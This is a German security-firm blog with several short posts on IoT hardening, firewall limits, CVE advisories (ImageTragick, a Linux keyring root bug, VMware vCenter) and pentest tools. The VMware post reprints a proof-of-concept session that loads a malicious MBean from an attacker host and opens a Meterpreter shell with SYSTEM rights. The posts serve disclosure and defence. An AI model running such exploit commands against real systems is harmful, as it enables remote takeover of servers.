06 Apr

IoT-Geräte sind nicht nur cool: Das Internet der Dinge braucht Sicherheit

IP-Kameras, Babyfons, Bewegungsmelder, verschiedene Sensoren oder Aktoren für das Eigenheim werden immer beliebter. Das Internet of Things boomt. Und die Produkte werden immer billiger. Verlockend, oder?

Da in den letzten Jahren auch die Installation immer einfacher geworden ist, werden diese Produkte nun immer häufiger eingesetzt.

SICHERHEITSBEDENKEN? FEHLANZEIGE.

Es hat aber schon Fälle gegeben, in denen diese „Things“ im Internet für ganz massive Verletzungen der Privatsphäre missbraucht wurden … und das ist wohl immer über Schwachstellen in der Softwareimplementierung und/oder durch fehlende Sicherheitsmechanismen gelaufen.

Besonders schockierend war ein Missbrauch, der sich folgendermaßen zugetragen hat: Ein Angreifer hatte sich Zugang zu einem Babyfon mit Kamera verschafft. Als der Vater – akustisch durch wüste Beschimpfungen alarmiert – ins Kinderzimmer kam, konnte er gerade noch „live“ registrieren, wie sich die Kamera des Babyfons bewegte und eine männliche Stimme über den Lautsprecher Obszönitäten verbreitete. Wirklich schlimm. Eine Horrorvision für alle Eltern.

Solche oder ähnliche Fälle ereignen sich tagtäglich, wobei ja nur ein ganz kleiner Prozentsatz den Weg in die Öffentlichkeit findet, da diese Angriffe entweder unentdeckt bleiben oder oft einfach verschwiegen werden.

Die Informationsübertragung: der erste kritische Punkt

Da ja die meisten dieser Produkte – egal ob Sicherheitskamera, Babyfon, Kühlschrank oder ein anderes Gerät – über ein Wireless-Signal (häufig auch über das hauseigene WLAN) verbunden werden, ist diese Informationsübertragung der erste abzusichernde Punkt.

Gerade wenn Geräte in das private WLAN eingebunden werden, sollte dieses ja die bestmögliche aller Sicherheiten aufweisen: momentan gängig ist die WPA2 mit AES/CCMP Verschlüsselung. Leider sind ältere Geräte auf die Benutzung dieses Verfahrens oft nicht eingerichtet. Und wenn dann (aus Verlegenheit, Bequemlichkeit oder falsch verstandener Sparsamkeit) auf das obsolete Verfahren WEP zurückgegriffen wird, ist so gut wie keine Absicherung gegeben.

Die alte WEP Verschlüsselung kann innerhalb von Minuten geknackt werden

Deshalb: WPA-unfähige Geräte unbedingt durch aktuellere Versionen bzw. Alternativprodukte ersetzen. Fortschritt muss (gerade bei der Sicherheitstechnik) oberstes Gebot sein!

Be ahead… der wichtigste Grundsatz für das proaktive Verhindern von Missbrauch

Im Idealfall wird ein zweites WLAN aufgebaut, in dem sich nur Geräte mit erhöhtem Risiko befinden, um im Fall eines erfolgreichen Angriffs das private WLAN nicht zu kompromittieren. Die meisten neueren WLAN-Router verfügen über dementsprechende Optionen.

Es ist außerdem unerlässlich, die Standardpasswörter (nicht die des WLAN, sondern ganz allgemein) zu ändern, da diese ganz leicht im Internet zu finden sind.

Da ja oft Sicherheitsprodukte wie Kameras oder Alarmanlagen (z.B. zur Überprüfung des Perimeters) von außen und somit vom Internet aus zugänglich sein sollen, müssen für diese Services besonders hohe Sicherheitsmaßnahmen mit besonderer Sorgfalt eingebunden werden.

Am besten und einfachsten ist eine VPN-Verbindung, die Zugriff zum privaten Netzwerk herstellen kann und die auch über eine starke Verschlüsselung verfügt. Dann können die Geräte wie von Zuhause aus verwendet werden.

Wenn diese Option nicht möglich ist, sollten jedoch zumindest die Services, auf die vom Internet aus zugegriffen werden soll, einerseits über eine verschlüsselte Verbindungverfügbar gemacht werden, anderseits das Service selbst mittels Authentifizierungund gegebenenfalls Autorisierung abgesichert werden.

Wenn diese Option nicht möglich ist, sollten jedoch zumindest die Services, auf die vom Internet aus zugegriffen werden soll, einerseits über eine verschlüsselte Verbindungverfügbar gemacht werden, anderseits das Service selbst mittels Authentifizierung und gegebenenfalls Autorisierung abgesichert werden.

Zuletzt ist der Einsatz einer Firewall mit integriertem IDS/IPS (Intrusion Detection/Prevention System) zu empfehlen, das Angriffe bzw. Schwachstellen erkennt. Diese Option erfordert jedoch schon etwas technisches Know-how und sollte, um eine reibungslose Funktion zu gewährleisten, unbedingt von Fachpersonal installiert und gewartet werden.

Die wichtigsten Punkte als Stichwortliste:

  • Firewall mit IDS/IPS
  • WLAN mit WPA2 und AES/CCMP
  • Zweites getrenntes (WLAN) Netzwerk
  • Standardpasswörter ändern
  • Starke Passwörter verwenden
  • Internet-Services absichern
29 Jul

Eine Firewall ist nicht genug!

Firewall und Antivirus sind nicht genug!

Gefahren durch Cybercrime lauern nicht nur außerhalb eines Unternehmensnetzwerks. Auch von „Innen“ können Unternehmen bspw. durch Mobile Geräte, USB-Sticks oder falsch konfigurierte kabellose Netzwerke angegriffen werden.  Eine wichtige Position in Punkto IT-Sicherheit nimmt hier natürlich die Firewall ein, welche den Übergang vom Internet in das lokale Netzwerk (LAN) absichert. Über sie laufen einige wichtige Kommunikationswege, wie bspw. E-Mail, Transaktionen oder Anbindungen zu Subfirmen oder Außenstellen. Entscheidend für ein gutes Sicherheitsniveau ist die fortlaufende Betreuung und Überprüfung dieses Systems. Die beste und teuerste Firewall kann auch nur dann effektiven Schutz bieten, wenn sie richtig konfiguriert, regelmäßig überprüft und aktualisiert wird.

Doch ist das ausreichend? Nein, das Internet ist nicht der einzige Weg für böswillige Hacker,  Maleware oder Ransomeware, welche sich im internen Netzwerk verbreiten können. Schlecht gewartete Server, welche aus dem Internet erreichbar sind, USB-Sticks, Notebooks, Mobiltelefone, usw. stellen ebenfalls ein hohes Risiko dar. Ein weiter wichtiger Punkt sind die eigenen Mitarbeiter, welche über Social Engineering angegriffen werden können. (Als Beispiel wäre hier der 50 Mio. Euro Angriff auf das Unternehmen FACC zu nennen. Link)

Wie kann sich ein Unternehmen nun wirksam schützen?
Vorab muss erwähnt werden, dass es keinen 100% Schutz geben kann. Unternehmen können sich jedoch gut schützen, indem sie Bewusstsein für IT-Sicherheit schaffen, was für die Managementebene sowie für MitarbeiterInnen gilt. Die Orientierung an der IT-Sicherheitsnorm ISO27002 stellt einen weiteren wichtigen Schritt zu guter IT-Sicherheit dar. Dies hört sich kompliziert an, ist aber weitgehend einfach und kostengünstig umzusetzen. Nicht immer müssen alle Punkte der ISO 27002 Norm müssen umgesetzt werden, häufig reicht es aus die wichtigsten Punkte der Norm zu überprüfen.

Die LemonPI GmbH (Link) hat hierzu einen Quick-Test entwickelt, welcher die wichtigsten Punkte der ISO 27002 umfasst. Nach einem etwa zweistündigen Interview mit den IT-Sicherheitsverantwortlichen bzw. der Geschäftsleitung und einer technischen Überprüfung wird ein schriftlicher Bericht inkl. eines Maßnahmenplans für das Unternehmen erstellt, welcher den aktuellen Sicherheitszustand des Unternehmens abbildet. Auf Wunsch kann das Ergebnis der Sicherheitsüberprüfung auch um IT- rechtliche Haftungsfragen ergänzt werden.

11 Mai

ImageTragick Exploit – Warnung an alle ImageMagick Benutzer

By ImageMagick development team [GPL (http://www.gnu.org/licenses/gpl.html)], via Wikimedia Commons
ImageTragick Exploit- Warnung an alle ImageMagick Benutzer

ImageMagick Is on Fire – CVE-2016-3714 Exploit
Mit einem präpariertem Bild ist es über einen simplen Bild upload möglich remote Code auszuführen. Der Exploit wird bereits aktiv genutzt!
Alle Webserver / Website Betreiber sollten ImageMagick und damit verbundene Plugins und Bibliotheken umgehend updaten. (PHP, Ruby, usw..)

Proof of concept (POC): Link..
Infos: Link..
CVE: Link..

Bildverweis:
By ImageMagick development team [GPL (http://www.gnu.org/licenses/gpl.html)], via Wikimedia Commons

#imagetragick #imagemagick #cve-2016-3714 #remotecodeexecution #exploit

09 Feb

2016 das Jahr der Hacker

mask2

2016 – das Jahr der Hacker

Das Jahr 2016 ist noch jung und dennoch mehren sich bereits jetzt die Berichte über Cyber-Attacken gegen Unternehmen und andere Einrichtungen. Wie etwa Futurezone berichtet hat, wurden derartige Hacks einerseits gegenüber dem Telekommunikationsanbieter A1 und andererseits gegenüber dem Wiener Volkshochschulen durchgeführt.

Fast gebetsmühlenartig wurde seitens der beiden Opfer versichert, dass keine problematischen Daten hinsichtlich der jeweiligen Kunden in Gefahr seien, jedoch hatte man als Kunde von A1 offenbar zumindest Verbindungsprobleme. Jedenfalls mittelbar waren also nicht nur die Unternehmen selbst betroffen, sondern auch die Benutzer der  A1 Dienste.

Wie bereits im ersten Artikel behandelt, begegnete man in Deutschland solchen vermehrten Angriffen mit der Schaffung eines eigenen IT-Sicherheitsgesetzes, welches Standards schaffen soll und überdies durch Zusammenarbeit der Behörden mit den Unternehmern einen besseren Schutz schaffen soll.
Geht man von dem deutschen IT-Sicherheitsgesetz aus, so kann man unter Umständen bei den Wiener Volkshochschulen noch diskutieren, ob es sich um ‚kritische Infrastruktur‘ handelt, ein Telekommunikationsanbieter wie A1 hingegen fällt schon mit ziemlicher Sicherheit in den Anwendungsbereich.

Spätestens durch die genannten Angriffe wird klar, dass derartige Vorfälle nicht nur Realität sind und in Zukunft auch zunehmen werden, sondern auch, dass die User nicht vollkommen außer Acht gelassen werden können. Denn letztlich zielen Hacks zumeist darauf ab, Daten auszulesen und zu erbeuten. Und gerade User-Daten sind wertvoller als man annehmen möchte, können sie doch beispielsweise wieder für Phishing-Versuche und Ähnliches verwendet werden.

Der österreichische Gesetzgeber hat immerhin einen ersten Schritt in die (richtige) Richtung genommen, als durch das Strafrechtsänderungsgesetz 2015 mit 1.1.2016 durch den neuen § 118a StGB das Hacking unter Strafe gestellt wurde. Thematisch wird das neue Delikt dabei in den Bereich Verletzungen der Privatsphäre und bestimmter Berufsgeheimnisse eingeordnet.
Doch ungeachtet dessen wäre es sinnvoll, wenn zusätzlich der Weg des deutschen Gesetzgebers gegangen werden und einheitliche Standards geschaffen würden. Denn nur in Kombination aus Prävention bei den potentiellen Opfern und Verfolgung der Täter kann ein tragfähiges Sicherheitsnetz zur Abwehr von Cyber-Attacken geschaffen werden.

Autor: 
Mag. Michael Lanzinger in Kooperation mit LemonPI GmbH
Mag. Michael Lanzinger ist derzeit Rechtsanwaltsanwärter am Ende seiner Ausbildung bei der Rechtsanwaltskanzlei Mag. Bonelli in Wels, Vortragender zum Thema Internetrecht sowie begeisterter User neuer Technologien.
20 Jan

Linux und Android Kernel – Zero-Day Root Exploit

CVE-2016-0728
Linux und Android Kernel – Zero-Day Root Exploit

(CVE-2016-0728) Die Lokale „root privilege escalation“ besteht seit 2012 und existiert in allen Kernel Versionen seit 3.8. D.h. mehrere Millionen 32/64bit Linux Systeme sind betroffen. Ebenso sind alle Android Versionen ab KitKat betroffen und das sind ca. 66 Prozent aller Android Systeme.

Für eine erfolgreichen Exploit muss der Angreifer bereits auf dem System angemeldet sein. Die Lücke befindet sich in der Speicherverarbeitung der Schlüsselbund-Komponente . (Dieser wird von Userspace Prozessen und Treibern dazu genutzt, Authentifizierungs- und Krypto-Schlüssel zu verwalten.) Durch ausnutzen eines Integer Overflows ist es möglich sich Systemrechte zu verschaffen.
Auf einem aktuellen Core i7 System ist die Durchlaufzeit des Exploits ca. 30 Minuten.
Der Exploit wird von Schutztechniken wie SMAP, SMEP oder SELinux (SEAndroid) erschwert bzw. verhindert wird.

Proof of Concept ist auf github unter folgendem Link zu finden: Proof of Concept Link
CVE RedHat
CVE Debian

14 Jan

Achtung UPC Kunden – Standard WLAN Passwörter leicht zu hacken

hackedDer niederländische Sicherheitsforscher Peter Geissler hat ein Tool veröffentlicht mit dem sich die Standard Passwörter von einigen UPC Modems leicht berechnen lassen.

UPC Kunden sollten ihre WLAN Kennwörter so schnell wie möglich ändern.

Fehler:
Das WPA2 Kennwort bei UPC Modems wird aus der geheimen Seriennummer des Modems generiert und genau hier hat UPC ordentlich gepatzt. Die Seriennummer korrespondiert unerfreulicherweise leider mit der ESSID welche öffentlich einsehbar ist.
Dadurch lässt sich das Kennwort mit wenig aufwand berechnen.

UPC hat begonnen seine Kunden per Mail zu informieren.

Hier finden sie die Anleitung zum ändern des WLAN Kennworts der verschiednen Modems von UPC:
Link

13 Jan

ChameleonMini – NFC/RFID Pentesting Tool

Neues NFC / RFID Security und Pentest Tool.
Die frei programmierbare Plattform kann perfekte Klone von verschiedenen bestehenden kommerziellen Smartcards , einschließlich kryptographische Funktionen, erstellen.
Es kann für verschiedenste RFID und NFC Angriffsszenarien verwendet werden, z.B. replay und relay attacks sowie state restoration attacks oder NFC sniffing.

mehr unter: https://www.kickstarter.com/projects/1980078555/chameleonmini-a-versatile-nfc-card-emulator-and-mo

03 Okt

Kritische Lücke in VMware vCenter Server und ESXi

LOGO1

Advisory ID: VMSA-2015-0007
CVE Numbers: CVE-2015-5177 CVE-2015-2342 CVE-2015-1047

CVE-2015-5177 – kritisch
Fehler im JMX-RMI-Service im vCenter Server. – Remote Code Execution
Hier ist bereits ein Metasploit Modul verfügbar.

Proof of Concept:
root@Whack:/opt/mjet# nmap -sS 1.1.1.2 -p 9875 –script=/usr/share/nmap/scripts/rmi-dumpregistry.nse
Starting Nmap 6.47 ( http://nmap.org ) at 2015-04-15 16:56 BST
Nmap scan report for 1.1.1.2
Host is up (0.00036s latency).
PORT STATE SERVICE
9875/tcp open java-rmi
| rmi-dumpregistry:
| jmxrmi
| javax.management.remote.rmi.RMIServerImpl_Stub
| @1.1.1.2:50966
| extends
| java.rmi.server.RemoteStub
| extends
|_ java.rmi.server.RemoteObject
MAC Address: 00:0C:29:D1:00:30 (VMware)
root@Whack:/opt/mjet# java -jar mjet.jar -t 1.1.1.2 -p 9875 -u http://1.1.1.1:8080/TArDcls4aeQZVWl
---------------------------------------------------
MJET - Mogwai Security JMX Exploitation Toolkit 0.1
--------------------------------------------------- 
[+] Connecting to JMX URL: service:jmx:rmi:///jndi/rmi://1.1.1.2:9875/jmxrmi ...
[+] Connected: rmi://1.1.1.2 16
[+] Trying to create MLet bean...
[+] Loaded javax.management.loading.MLet
[+] Loading malicious MBean from http://1.1.1.1:8080/TArDcls4aeQZVWl
[+] Invoking: javax.management.loading.MLet.getMBeansFromURL
[+] Loaded class: metasploit.Metasploit
[+] Loaded MBean Server ID: drmwfzvo:name=NApCjRCB,id=gsKsVVHK
[+] Invoking: metasploit.Metasploit.run()
[+] Done
Metasploit Shell
-------------------------
2015-02-24 10:11:44 +0000 S:0 J:3 msf exploit(java_mlet_server) >
[*] Using URL: http://1.1.1.1:8080/TArDcls4aeQZVWl
[*] Server started.
[*] 1.1.1.2 java_mlet_server - handling request for /TArDcls4aeQZVWl
[*] 1.1.1.2 java_mlet_server - handling request for /TArDcls4aeQZVWl/
[*] 1.1.1.2 java_mlet_server - handling request for /W5PqWUoBP/JOqDKhBd.jar
[*] 1.1.1.2 java_mlet_server - handling request for /W5PqWUoBP/JOqDKhBd.jar
[*] Sending stage (30355 bytes) to 1.1.1.2
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 1.1.1.2:50456) at 2015-02-24 10:12:32 +0000
 
2015-02-24 10:14:10 +0000 S:1 J:3 msf exploit(java_mlet_server) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: SYSTEM

CVE-2015-5177:
Fehler in der OpenSLP-Funktion – Remote Code Execution
Betroffene Versionen 5.0, 5.1 und 5.5

CVE-2015-1047:
Der vpxd Service bei den Versionen 5.0,5.1 und 5.5 ist für DoS-Attacken anfällig.

Entsprechende Updates sind bei VMware bereits verfügbar.

02 Okt

Evil FOCA – Network Attack Tool

Evil FOCA ist ein Windows Tool zum überprüfen der Sicherheit von IPV4 und IPV6 Netzen für Pentester und Auditoren.

Folgende Attacken sind möglich:

  • MITM über IPV4 mit ARP spoofing und DHCP ACK Injections.
  • MITM über IPV6 mit Neighbor Advertisment Spooing, SLAAC attacks und fake DHCPv6
  • DoS auf IPV4 mit ARP Spoofing
  • DoS auf IPV6 mit SLAAC DoS
  • DNS Hijacking

Evil FOCA scannt automatisch das gesammte Netz, alle Geräte und deren Netzwerkinterfaces, und fügt alle IPV6, IPV4 und Physische Adressen in ein intuitives Interface ein.

Evil Foca is released under the GNU Public License 3.0
Link